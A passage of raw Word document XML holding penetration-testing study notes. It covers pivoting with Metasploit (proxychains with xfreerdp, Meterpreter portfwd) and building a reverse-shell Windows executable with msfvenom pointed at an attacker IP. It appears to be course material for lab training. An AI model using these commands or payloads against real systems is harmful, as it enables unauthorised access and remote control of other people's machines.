      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to take advantage of the SOCKS5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the configuration file, it should appear as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4252913" cy="1724338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4252913" cy="1724338"/>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5AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain GUI access from our Kali Linux system to the target machine on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali, use xfreerdp3 instead</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5363752" cy="3257792"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="208" name="image207.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image207.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5363752" cy="3257792"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> client opens a new window providing us access to the GUI of ITWK02 in the internal network via RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B5">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! Figure 1 shows that we successfully connected to the second target via RDP by pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use a similar technique for port forwarding using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command from inside a Meterpreter session, which will forward a specific port to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You must use port forwarding here because the Kali attacker box cannot reach the internal host directly. Port forwarding via Meterpreter allows you to pivot through the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4860421" cy="2500313"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="510" name="image501.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image501.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860421"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5B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can create a port forward from localhost port 3389 to port 3389 on the target host (172.16.5.200) as shown in Listing 85.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="370" name="image355.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image355.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>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5BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd add -l 3389 -p 3389 -r 172.16.5.200</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's test this by connecting to 127.0.0.1:3389 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the compromised host in the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="434" name="image429.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image429.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this technique, we can gain a remote desktop session on a host we were otherwise not able to reach from our Kali system. Likewise, if the second target machine was connected to an additional network, we could create a chain of pivots to reach further hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we explored various methods and modules to pivot within Metasploit. We learned how to manually and automatically set routes through existing sessions and interact with systems reachable by these routes. Then, we leveraged the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to create a SOCKS proxy to reach the second target machine with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we used the Meterpreter command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to forward ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7v9nxvtzuh8j" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (21.2.3. Executable Payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool in metasploit to create executable payloads. Very useful if you want to create payloads that are custom for your target machine's architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get familiar with msfvenom, we'll first create a malicious Windows binary starting a raw TCP reverse shell. Let's begin by listing all payloads with payloads as argument for -l. In addition, we use --platform to specify the platform for the payload and --arch for the architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="395" name="image399.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image399.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14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CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -l payloads --platform windows --arch x64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 46 shows that we can choose between a staged and non-staged payload. For this example, we'll use the non-staged payload first.</w:t>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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_junai5ar3d2p" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-staged msfvenom payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D4">
      <w:pPr>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Now, let's use the -p flag to set the payload, set LHOST and LPORT to assign the host and port for the reverse connection, -f to set the output format (exe in this case), and -o to specify the output file name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="128" name="image127.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image127.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is payload for 64-bit. For 32-bit, use windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
